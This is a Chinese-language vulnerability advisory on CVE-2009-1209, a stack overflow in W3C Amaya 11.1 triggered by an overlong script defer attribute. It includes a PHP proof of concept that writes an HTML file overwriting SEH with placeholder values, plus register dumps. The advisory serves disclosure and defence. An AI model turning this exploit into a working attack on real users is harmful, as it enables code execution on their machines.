安全研究

安全漏洞
W3C Amaya HTML script标签栈溢出漏洞

发布日期:2009-03-30
更新日期:2009-04-01

受影响系统:
W3C Amaya 11.1
描述:
BUGTRAQ  ID: 34295
CVE(CAN) ID: CVE-2009-1209

Amaya是W3C出品的所见即所得的网页编辑/浏览器。

如果用户受骗使用Amaya打开的网页中script标签设置了超长的defer属性的话,则在解析该网页时就可以触发栈溢出,导致执行任意代码。

<*来源:Alfons Luja
  
  链接:http://secunia.com/advisories/34531/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<?php

/**//*

     Amaya 11.1 W3C's editor/browser
     Stack Owerflow POC
     Discover by Alfons Luja
     Thx : OiN
     select * from friends --
     This stUff overwrite SEH in my box XP home sp 2
     To correctly overwrite seh you must upload "remote_love.html" to remote server
     Amaya allow only printable shellcode in this case  
    
     EAX:00000000
     ECX:43434343
     EDX:7C9037D8
     EBX:00000000
     ESP:0012DDD0
     EBP:0012DDF0
     ESI:00000000
     EDI:00000000
     EIP:43434343
    
      
*//**/

$junk = "\x41";
$n_seh = "\x42\x42\x42\x42";  //pointer to next seh
$h_seh = "\x43\x43\x43\x43";  //seh handler

for($i=1;$i<7000 - (4*19) - 10;$i++){ $junk.="\x41"; }

$junk.=$n_seh;
$junk.=$h_seh;
$hello = "<script defer=\"".$junk."\">";

$hnd = fopen("remote_love.html","w");
    
       if($hnd){

          fputs($hnd,$hello);
          fclose($hnd);
          echo"DONE !!\n";
    
       } else {

          echo"Kupa !!\n";

       }

?>

http://www.milw0rm.com/exploits/8321

建议:
厂商补丁:

W3C
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.w3.org/Amaya/

浏览次数:2404
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障